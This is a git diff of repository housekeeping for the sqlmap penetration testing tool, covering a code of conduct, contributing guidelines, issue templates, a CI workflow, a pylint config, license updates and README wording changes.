Update of checksums

added kurdish(ckb) translation

.gitattributes

@@ -1,6 +1,18 @@
 *.conf text eol=lf
+*.json text eol=lf
+*.html text eol=lf
+*.md text eol=lf
 *.md5 text eol=lf
+*.pl text eol=lf
 *.py text eol=lf
+*.sh text eol=lf
+*.sql text eol=lf
+*.txt text eol=lf
+*.xml text eol=lf
+*.yaml text eol=lf
+*.yml text eol=lf
+LICENSE text eol=lf
+COMMITMENT text eol=lf
 
 *_ binary
 *.dll binary

.github/CODE_OF_CONDUCT.md

@@ -0,0 +1,46 @@
+# Contributor Covenant Code of Conduct
+
+## Our Pledge
+
+In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.
+
+## Our Standards
+
+Examples of behavior that contributes to creating a positive environment include:
+
+* Using welcoming and inclusive language
+* Being respectful of differing viewpoints and experiences
+* Gracefully accepting constructive criticism
+* Focusing on what is best for the community
+* Showing empathy towards other community members
+
+Examples of unacceptable behavior by participants include:
+
+* The use of sexualized language or imagery and unwelcome sexual attention or advances
+* Trolling, insulting/derogatory comments, and personal or political attacks
+* Public or private harassment
+* Publishing others' private information, such as a physical or electronic address, without explicit permission
+* Other conduct which could reasonably be considered inappropriate in a professional setting
+
+## Our Responsibilities
+
+Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
+
+Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.
+
+## Scope
+
+This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.
+
+## Enforcement
+
+Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at dev@sqlmap.org. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.
+
+Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
+
+## Attribution
+
+This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version]
+
+[homepage]: http://contributor-covenant.org
+[version]: http://contributor-covenant.org/version/1/4/

.github/CONTRIBUTING.md

@@ -1,38 +1,36 @@
-# Contributing to sqlmap
+# Contributing to sqlmap
-
+
-## Reporting bugs
+## Reporting bugs
-
+
-**Bug reports are welcome**!
+**Bug reports are welcome**!
-Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues).
+Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues).
-
+
-### Guidelines
+### Guidelines
-
+
-* Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant.
+* Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant.
-* Make sure you can reproduce the bug with the latest development version of sqlmap.
+* Make sure you can reproduce the bug with the latest development version of sqlmap.
-* Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal.
+* Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal.
-* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?*
+* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?*
-* If you are not sure whether something is a bug, or want to discuss a potential new feature before putting in an enhancement request, the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) is a good place to bring it up.
+
-
+## Submitting code changes
-## Submitting code changes
+
-
+All code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve it](https://github.com/sqlmapproject/sqlmap/issues/37).
-All code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve it](https://github.com/sqlmapproject/sqlmap/issues/37).
+
-
+Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests).
-Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests).
+Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next!
-Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next!
+
-
+### Guidelines
-### Guidelines
+
-
+In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions:
-In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions:
+
-
+* Each patch should make one logical change.
-* Each patch should make one logical change.
+* Avoid tabbing, use four blank spaces instead.
-* Wrap code to 76 columns when possible.
+* Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:dev@sqlmap.org).
-* Avoid tabbing, use four blank spaces instead.
+* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected.
-* Before you put time into a non-trivial patch, it is worth discussing it on the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) or privately by [email](mailto:dev@sqlmap.org).
+* Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests.
-* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected.
+* Style that is too different from main branch will be ''adapted'' by the developers side.
-* Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests.
+* Do not touch anything inside `thirdparty/` and `extra/` folders.
-* Style that is too different from main branch will be ''adapted'' by the developers side.
+
-* Do not touch anything inside `thirdparty/` and `extra/` folders.
+### Licensing
-
+
-### Licensing
+By submitting code contributions to the sqlmap developers or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them.
-
-By submitting code contributions to the sqlmap developers, to the mailing list, or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them.

.github/FUNDING.yml

@@ -0,0 +1 @@
+github: sqlmapproject

.github/ISSUE_TEMPLATE/bug_report.md

@@ -0,0 +1,37 @@
+---
+name: Bug report
+about: Create a report to help us improve
+title: ''
+labels: bug report
+assignees: ''
+
+---
+
+**Describe the bug**
+A clear and concise description of what the bug is.
+
+**To Reproduce**
+1. Run '...'
+2. See error
+
+**Expected behavior**
+A clear and concise description of what you expected to happen.
+
+**Screenshots**
+If applicable, add screenshots to help explain your problem.
+
+**Running environment:**
+ - sqlmap version [e.g. 1.7.2.12#dev]
+ - Installation method [e.g. pip]
+ - Operating system: [e.g. Microsoft Windows 11]
+ - Python version [e.g. 3.11.2]
+
+**Target details:**
+ - DBMS [e.g. Microsoft SQL Server]
+ - SQLi techniques found by sqlmap [e.g. error-based and boolean-based blind]
+ - WAF/IPS [if any]
+ - Relevant console output [if any]
+ - Exception traceback [if any]
+
+**Additional context**
+Add any other context about the problem here.

.github/ISSUE_TEMPLATE/feature_request.md

@@ -0,0 +1,20 @@
+---
+name: Feature request
+about: Suggest an idea for this project
+title: ''
+labels: feature request
+assignees: ''
+
+---
+
+**Is your feature request related to a problem? Please describe.**
+A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
+
+**Describe the solution you'd like**
+A clear and concise description of what you want to happen.
+
+**Describe alternatives you've considered**
+A clear and concise description of any alternative solutions or features you've considered.
+
+**Additional context**
+Add any other context or screenshots about the feature request here.

.github/workflows/tests.yml

@@ -0,0 +1,28 @@
+on:
+  push:
+    branches: [ master ]
+  pull_request:
+    branches: [ master ]
+
+jobs:
+  build:
+    runs-on: ${{ matrix.os }}
+    strategy:
+      matrix:
+        os: [ubuntu-latest, macos-latest, windows-latest]
+        python-version: [ 'pypy-2.7', '3.12' ]
+        exclude:
+          - os: macos-latest
+            python-version: 'pypy-2.7'
+    steps:
+      - uses: actions/checkout@v2
+      - name: Set up Python
+        uses: actions/setup-python@v2
+        with:
+          python-version: ${{ matrix.python-version }}
+      - name: Basic import test
+        run: python -c "import sqlmap; import sqlmapapi"
+      - name: Smoke test
+        run: python sqlmap.py --smoke
+      - name: Vuln test
+        run: python sqlmap.py --vuln

.gitignore

@@ -1,5 +1,8 @@
-*.py[cod]
 output/
+__pycache__/
+*.py[cod]
 .sqlmap_history
 traffic.txt
-*~
+*~
+req*.txt
+.idea/

.pylintrc

@@ -0,0 +1,546 @@
+# Based on Apache 2.0 licensed code from https://github.com/ClusterHQ/flocker
+
+[MASTER]
+
+# Specify a configuration file.
+#rcfile=
+
+# Python code to execute, usually for sys.path manipulation such as
+# pygtk.require().
+init-hook="from pylint.config import find_pylintrc; import os, sys; sys.path.append(os.path.dirname(find_pylintrc()))"
+
+# Add files or directories to the blacklist. They should be base names, not
+# paths.
+ignore=
+
+# Pickle collected data for later comparisons.
+persistent=no
+
+# List of plugins (as comma separated values of python modules names) to load,
+# usually to register additional checkers.
+load-plugins=
+
+# Use multiple processes to speed up Pylint.
+# DO NOT CHANGE THIS VALUES >1 HIDE RESULTS!!!!!
+jobs=1
+
+# Allow loading of arbitrary C extensions. Extensions are imported into the
+# active Python interpreter and may run arbitrary code.
+unsafe-load-any-extension=no
+
+# A comma-separated list of package or module names from where C extensions may
+# be loaded. Extensions are loading into the active Python interpreter and may
+# run arbitrary code
+extension-pkg-whitelist=
+
+# Allow optimization of some AST trees. This will activate a peephole AST
+# optimizer, which will apply various small optimizations. For instance, it can
+# be used to obtain the result of joining multiple strings with the addition
+# operator. Joining a lot of strings can lead to a maximum recursion error in
+# Pylint and this flag can prevent that. It has one side effect, the resulting
+# AST will be different than the one from reality.
+optimize-ast=no
+
+
+[MESSAGES CONTROL]
+
+# Only show warnings with the listed confidence levels. Leave empty to show
+# all. Valid levels: HIGH, INFERENCE, INFERENCE_FAILURE, UNDEFINED
+confidence=
+
+# Enable the message, report, category or checker with the given id(s). You can
+# either give multiple identifier separated by comma (,) or put this option
+# multiple time. See also the "--disable" option for examples.
+disable=all
+
+enable=import-error,
+       import-self,
+       reimported,
+       wildcard-import,
+       misplaced-future,
+       deprecated-module,
+       unpacking-non-sequence,
+       invalid-all-object,
+       undefined-all-variable,
+       used-before-assignment,
+       cell-var-from-loop,
+       global-variable-undefined,
+       redefine-in-handler,
+       unused-import,
+       unused-wildcard-import,
+       global-variable-not-assigned,
+       undefined-loop-variable,
+       global-at-module-level,
+       bad-open-mode,
+       redundant-unittest-assert,
+       boolean-datetime
+       deprecated-method,
+       anomalous-unicode-escape-in-string,
+       anomalous-backslash-in-string,
+       not-in-loop,
+       continue-in-finally,
+       abstract-class-instantiated,
+       star-needs-assignment-target,
+       duplicate-argument-name,
+       return-in-init,
+       too-many-star-expressions,
+       nonlocal-and-global,
+       return-outside-function,
+       return-arg-in-generator,
+       invalid-star-assignment-target,
+       bad-reversed-sequence,
+       nonexistent-operator,
+       yield-outside-function,
+       init-is-generator,
+       nonlocal-without-binding,
+       lost-exception,
+       assert-on-tuple,
+       dangerous-default-value,
+       duplicate-key,
+       useless-else-on-loop
+       expression-not-assigned,
+       confusing-with-statement,
+       unnecessary-lambda,
+       pointless-statement,
+       pointless-string-statement,
+       unnecessary-pass,
+       unreachable,
+       using-constant-test,
+       bad-super-call,
+       missing-super-argument,
+       slots-on-old-class,
+       super-on-old-class,
+       property-on-old-class,
+       not-an-iterable,
+       not-a-mapping,
+       format-needs-mapping,
+       truncated-format-string,
+       missing-format-string-key,
+       mixed-format-string,
+       too-few-format-args,
+       bad-str-strip-call,
+       too-many-format-args,
+       bad-format-character,
+       format-combined-specification,
+       bad-format-string-key,
+       bad-format-string,
+       missing-format-attribute,
+       missing-format-argument-key,
+       unused-format-string-argument
+       unused-format-string-key,
+       invalid-format-index,
+       bad-indentation,
+       mixed-indentation,
+       unnecessary-semicolon,
+       lowercase-l-suffix,
+       invalid-encoded-data,
+       unpacking-in-except,
+       import-star-module-level,
+       long-suffix,
+       old-octal-literal,
+       old-ne-operator,
+       backtick,
+       old-raise-syntax,
+       metaclass-assignment,
+       next-method-called,
+       dict-iter-method,
+       dict-view-method,
+       indexing-exception,
+       raising-string,
+       using-cmp-argument,
+       cmp-method,
+       coerce-method,
+       delslice-method,
+       getslice-method,
+       hex-method,
+       nonzero-method,
+       t-method,
+       setslice-method,
+       old-division,
+       logging-format-truncated,
+       logging-too-few-args,
+       logging-too-many-args,
+       logging-unsupported-format,
+       logging-format-interpolation,
+       invalid-unary-operand-type,
+       unsupported-binary-operation,
+       not-callable,
+       redundant-keyword-arg,
+       assignment-from-no-return,
+       assignment-from-none,
+       not-context-manager,
+       repeated-keyword,
+       missing-kwoa,
+       no-value-for-parameter,
+       invalid-sequence-index,
+       invalid-slice-index,
+       unexpected-keyword-arg,
+       unsupported-membership-test,
+       unsubscriptable-object,
+       access-member-before-definition,
+       method-hidden,
+       assigning-non-slot,
+       duplicate-bases,
+       inconsistent-mro,
+       inherit-non-class,
+       invalid-slots,
+       invalid-slots-object,
+       no-method-argument,
+       no-self-argument,
+       unexpected-special-method-signature,
+       non-iterator-returned,
+       arguments-differ,
+       signature-differs,
+       bad-staticmethod-argument,
+       non-parent-init-called,
+       bad-except-order,
+       catching-non-exception,
+       bad-exception-context,
+       notimplemented-raised,
+       raising-bad-type,
+       raising-non-exception,
+       misplaced-bare-raise,
+       duplicate-except,
+       nonstandard-exception,
+       binary-op-exception,
+       not-async-context-manager,
+       yield-inside-async-function
+
+# Needs investigation:
+# abstract-method (might be indicating a bug? probably not though)
+# protected-access (requires some refactoring)
+# attribute-defined-outside-init (requires some refactoring)
+# super-init-not-called (requires some cleanup)
+
+# Things we'd like to enable someday:
+# redefined-builtin (requires a bunch of work to clean up our code first)
+# redefined-outer-name (requires a bunch of work to clean up our code first)
+# undefined-variable (re-enable when pylint fixes https://github.com/PyCQA/pylint/issues/760)
+# no-name-in-module (giving us spurious warnings https://github.com/PyCQA/pylint/issues/73)
+# unused-argument (need to clean up or code a lot, e.g. prefix unused_?)
+# function-redefined (@overload causes lots of spurious warnings)
+# too-many-function-args (@overload causes spurious warnings... I think)
+# parameter-unpacking (needed for eventual Python 3 compat)
+# print-statement (needed for eventual Python 3 compat)
+# filter-builtin-not-iterating (Python 3)
+# map-builtin-not-iterating (Python 3)
+# range-builtin-not-iterating (Python 3)
+# zip-builtin-not-iterating (Python 3)
+# many others relevant to Python 3
+# unused-variable (a little work to cleanup, is all)
+
+# ...
+[REPORTS]
+
+# Set the output format. Available formats are text, parseable, colorized, msvs
+# (visual studio) and html. You can also give a reporter class, eg
+# mypackage.mymodule.MyReporterClass.
+output-format=parseable
+
+# Put messages in a separate file for each module / package specified on the
+# command line instead of printing them on stdout. Reports (if any) will be
+# written in a file name "pylint_global.[txt|html]".
+files-output=no
+
+# Tells whether to display a full report or only the messages
+reports=no
+
+# Python expression which should return a note less than 10 (10 is the highest
+# note). You have access to the variables errors warning, statement which
+# respectively contain the number of errors / warnings messages and the total
+# number of statements analyzed. This is used by the global evaluation report
+# (RP0004).
+evaluation=10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10)
+
+# Template used to display messages. This is a python new-style format string
+# used to format the message information. See doc for all details
+#msg-template=
+
+
+[LOGGING]
+
+# Logging modules to check that the string format arguments are in logging
+# function parameter format
+logging-modules=logging
+
+
+[FORMAT]
+
+# Maximum number of characters on a single line.
+max-line-length=100
+
+# Regexp for a line that is allowed to be longer than the limit.
+ignore-long-lines=^\s*(# )?<?https?://\S+>?$
+
+# Allow the body of an if to be on the same line as the test if there is no
+# else.
+single-line-if-stmt=no
+
+# List of optional constructs for which whitespace checking is disabled. `dict-
+# separator` is used to allow tabulation in dicts, etc.: {1  : 1,\n222: 2}.
+# `trailing-comma` allows a space between comma and closing bracket: (a, ).
+# `empty-line` allows space-only lines.
+no-space-check=trailing-comma,dict-separator
+
+# Maximum number of lines in a module
+max-module-lines=1000
+
+# String used as indentation unit. This is usually "    " (4 spaces) or "\t" (1
+# tab).
+indent-string='    '
+
+# Number of spaces of indent required inside a hanging  or continued line.
+indent-after-paren=4
+
+# Expected format of line ending, e.g. empty (any line ending), LF or CRLF.
+expected-line-ending-format=
+
+
+[TYPECHECK]
+
+# Tells whether missing members accessed in mixin class should be ignored. A
+# mixin class is detected if its name ends with "mixin" (case insensitive).
+ignore-mixin-members=yes
+
+# List of module names for which member attributes should not be checked
+# (useful for modules/projects where namespaces are manipulated during runtime
+# and thus existing member attributes cannot be deduced by static analysis. It
+# supports qualified module names, as well as Unix pattern matching.
+ignored-modules=thirdparty.six.moves
+
+# List of classes names for which member attributes should not be checked
+# (useful for classes with attributes dynamically set). This supports can work
+# with qualified names.
+ignored-classes=
+
+# List of members which are set dynamically and missed by pylint inference
+# system, and so shouldn't trigger E1101 when accessed. Python regular
+# expressions are accepted.
+generated-members=
+
+
+[VARIABLES]
+
+# Tells whether we should check for unused import in __init__ files.
+init-import=no
+
+# A regular expression matching the name of dummy variables (i.e. expectedly
+# not used).
+dummy-variables-rgx=_$|dummy
+
+# List of additional names supposed to be defined in builtins. Remember that
+# you should avoid to define new builtins when possible.
+additional-builtins=
+
+# List of strings which can identify a callback function by name. A callback
+# name must start or end with one of those strings.
+callbacks=cb_,_cb
+
+
+[SIMILARITIES]
+
+# Minimum lines number of a similarity.
+min-similarity-lines=4
+
+# Ignore comments when computing similarities.
+ignore-comments=yes
+
+# Ignore docstrings when computing similarities.
+ignore-docstrings=yes
+
+# Ignore imports when computing similarities.
+ignore-imports=no
+
+
+[SPELLING]
+
+# Spelling dictionary name. Available dictionaries: none. To make it working
+# install python-enchant package.
+spelling-dict=
+
+# List of comma separated words that should not be checked.
+spelling-ignore-words=
+
+# A path to a file that contains private dictionary; one word per line.
+spelling-private-dict-file=
+
+# Tells whether to store unknown words to indicated private dictionary in
+# --spelling-private-dict-file option instead of raising a message.
+spelling-store-unknown-words=no
+
+
+[MISCELLANEOUS]
+
+# List of note tags to take in consideration, separated by a comma.
+notes=FIXME,XXX,TODO
+
+
+[BASIC]
+
+# List of builtins function names that should not be used, separated by a comma
+bad-functions=map,filter,input
+
+# Good variable names which should always be accepted, separated by a comma
+good-names=i,j,k,ex,Run,_
+
+# Bad variable names which should always be refused, separated by a comma
+bad-names=foo,bar,baz,toto,tutu,tata
+
+# Colon-delimited sets of names that determine each other's naming style when
+# the name regexes allow several styles.
+name-group=
+
+# Include a hint for the correct naming format with invalid-name
+include-naming-hint=no
+
+# Regular expression matching correct function names
+function-rgx=[a-z_][a-z0-9_]{2,30}$
+
+# Naming hint for function names
+function-name-hint=[a-z_][a-z0-9_]{2,30}$
+
+# Regular expression matching correct variable names
+variable-rgx=[a-z_][a-z0-9_]{2,30}$
+
+# Naming hint for variable names
+variable-name-hint=[a-z_][a-z0-9_]{2,30}$
+
+# Regular expression matching correct constant names
+const-rgx=(([A-Z_][A-Z0-9_]*)|(__.*__))$
+
+# Naming hint for constant names
+const-name-hint=(([A-Z_][A-Z0-9_]*)|(__.*__))$
+
+# Regular expression matching correct attribute names
+attr-rgx=[a-z_][a-z0-9_]{2,30}$
+
+# Naming hint for attribute names
+attr-name-hint=[a-z_][a-z0-9_]{2,30}$
+
+# Regular expression matching correct argument names
+argument-rgx=[a-z_][a-z0-9_]{2,30}$
+
+# Naming hint for argument names
+argument-name-hint=[a-z_][a-z0-9_]{2,30}$
+
+# Regular expression matching correct class attribute names
+class-attribute-rgx=([A-Za-z_][A-Za-z0-9_]{2,30}|(__.*__))$
+
+# Naming hint for class attribute names
+class-attribute-name-hint=([A-Za-z_][A-Za-z0-9_]{2,30}|(__.*__))$
+
+# Regular expression matching correct inline iteration names
+inlinevar-rgx=[A-Za-z_][A-Za-z0-9_]*$
+
+# Naming hint for inline iteration names
+inlinevar-name-hint=[A-Za-z_][A-Za-z0-9_]*$
+
+# Regular expression matching correct class names
+class-rgx=[A-Z_][a-zA-Z0-9]+$
+
+# Naming hint for class names
+class-name-hint=[A-Z_][a-zA-Z0-9]+$
+
+# Regular expression matching correct module names
+module-rgx=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$
+
+# Naming hint for module names
+module-name-hint=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$
+
+# Regular expression matching correct method names
+method-rgx=[a-z_][a-z0-9_]{2,30}$
+
+# Naming hint for method names
+method-name-hint=[a-z_][a-z0-9_]{2,30}$
+
+# Regular expression which should only match function or class names that do
+# not require a docstring.
+no-docstring-rgx=^_
+
+# Minimum line length for functions/classes that require docstrings, shorter
+# ones are exempt.
+docstring-min-length=-1
+
+
+[ELIF]
+
+# Maximum number of nested blocks for function / method body
+max-nested-blocks=5
+
+
+[IMPORTS]
+
+# Deprecated modules which should not be used, separated by a comma
+deprecated-modules=regsub,TERMIOS,Bastion,rexec
+
+# Create a graph of every (i.e. internal and external) dependencies in the
+# given file (report RP0402 must not be disabled)
+import-graph=
+
+# Create a graph of external dependencies in the given file (report RP0402 must
+# not be disabled)
+ext-import-graph=
+
+# Create a graph of internal dependencies in the given file (report RP0402 must
+# not be disabled)
+int-import-graph=
+
+
+[DESIGN]
+
+# Maximum number of arguments for function / method
+max-args=5
+
+# Argument names that match this expression will be ignored. Default to name
+# with leading underscore
+ignored-argument-names=_.*
+
+# Maximum number of locals for function / method body
+max-locals=15
+
+# Maximum number of return / yield for function / method body
+max-returns=6
+
+# Maximum number of branch for function / method body
+max-branches=12
+
+# Maximum number of statements in function / method body
+max-statements=50
+
+# Maximum number of parents for a class (see R0901).
+max-parents=7
+
+# Maximum number of attributes for a class (see R0902).
+max-attributes=7
+
+# Minimum number of public methods for a class (see R0903).
+min-public-methods=2
+
+# Maximum number of public methods for a class (see R0904).
+max-public-methods=20
+
+# Maximum number of boolean expressions in a if statement
+max-bool-expr=5
+
+
+[CLASSES]
+
+# List of method names used to declare (i.e. assign) instance attributes.
+defining-attr-methods=__init__,__new__,setUp
+
+# List of valid names for the first argument in a class method.
+valid-classmethod-first-arg=cls
+
+# List of valid names for the first argument in a metaclass class method.
+valid-metaclass-classmethod-first-arg=mcs
+
+# List of member names, which should be excluded from the protected access
+# warning.
+exclude-protected=_asdict,_fields,_replace,_source,_make
+
+
+[EXCEPTIONS]
+
+# Exceptions that will emit a warning when being caught. Defaults to
+# "Exception"
+overgeneral-exceptions=Exception

.travis.yml

@@ -1,6 +0,0 @@
-language: python
-python:
-    - "2.6"
-    - "2.7"
-script:
-    - python -c "import sqlmap; import sqlmapapi"

LICENSE

@@ -1,7 +1,7 @@
 COPYING -- Describes the terms under which sqlmap is distributed. A copy
 of the GNU General Public License (GPL) is appended to this file.
 
-sqlmap is (C) 2006-2016 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
+sqlmap is (C) 2006-2025 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
 
 This program is free software; you may redistribute and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -31,6 +31,9 @@ interpretation of derived works with some common examples. Our
 interpretation applies only to sqlmap - we do not speak for other people's
 GPL works.
 
+This license does not apply to the third-party components. More details can
+be found inside the file 'doc/THIRD-PARTY.md'.
+
 If you have any questions about the GPL licensing restrictions on using
 sqlmap in non-GPL works, we would be happy to help. As mentioned above,
 we also offer alternative license to integrate sqlmap into proprietary
@@ -46,14 +49,14 @@ to know exactly what a program is going to do before they run it.
 Source code also allows you to fix bugs and add new features. You are
 highly encouraged to send your changes to dev@sqlmap.org for possible
 incorporation into the main distribution. By sending these changes to the
-sqlmap developers, to the mailing lists, or via Git pull request, checking
+sqlmap developers or via Git pull request, checking them into the sqlmap
-them into the sqlmap source code repository, it is understood (unless you
+source code repository, it is understood (unless you specify otherwise)
-specify otherwise) that you are offering the sqlmap project the unlimited,
+that you are offering the sqlmap project the unlimited, non-exclusive
-non-exclusive right to reuse, modify, and relicense the code. sqlmap will
+right to reuse, modify, and relicense the code. sqlmap will always be
-always be available Open Source, but this is important because the
+available Open Source, but this is important because the inability to
-inability to relicense code has caused devastating problems for other Free
+relicense code has caused devastating problems for other Free Software
-Software projects (such as KDE and NASM). If you wish to specify special
+projects (such as KDE and NASM). If you wish to specify special license
-license conditions of your contributions, just say so when you send them.
+conditions of your contributions, just say so when you send them.
 
 This program is distributed in the hope that it will be useful, but
 WITHOUT ANY WARRANTY; without even the implied warranty of
@@ -343,30 +346,3 @@ PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
 POSSIBILITY OF SUCH DAMAGES.
 
                      END OF TERMS AND CONDITIONS
-
-****************************************************************************
-
-This license does not apply to the following components:
-
-* The Ansistrm library located under thirdparty/ansistrm/.
-* The Beautiful Soup library located under thirdparty/beautifulsoup/.
-* The Bottle library located under thirdparty/bottle/.
-* The Chardet library located under thirdparty/chardet/.
-* The ClientForm library located under thirdparty/clientform/.
-* The Colorama library located under thirdparty/colorama/.
-* The Fcrypt library located under thirdparty/fcrypt/.
-* The Gprof2dot library located under thirdparty/gprof2dot/.
-* The KeepAlive library located under thirdparty/keepalive/.
-* The Magic library located under thirdparty/magic/.
-* The MultipartPost library located under thirdparty/multipartpost/.
-* The Odict library located under thirdparty/odict/.
-* The Oset library located under thirdparty/oset/.
-* The PageRank library located under thirdparty/pagerank/.
-* The PrettyPrint library located under thirdparty/prettyprint/.
-* The PyDes library located under thirdparty/pydes/.
-* The SocksiPy library located under thirdparty/socks/.
-* The Termcolor library located under thirdparty/termcolor/.
-* The XDot library located under thirdparty/xdot/.
-* The icmpsh tool located under extra/icmpsh/.
-
-Details for the above packages can be found in the THIRD-PARTY.md file.

README.md

@@ -1,26 +1,26 @@
-# sqlmap
+# sqlmap ![](https://i.imgur.com/fe85aVR.png)
 
-[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
 
-sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
+sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.
 
 Screenshots
 ----
 
 ![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
 
-You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of features on the wiki.
+You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of the features on the wiki.
 
 Installation
 ----
 
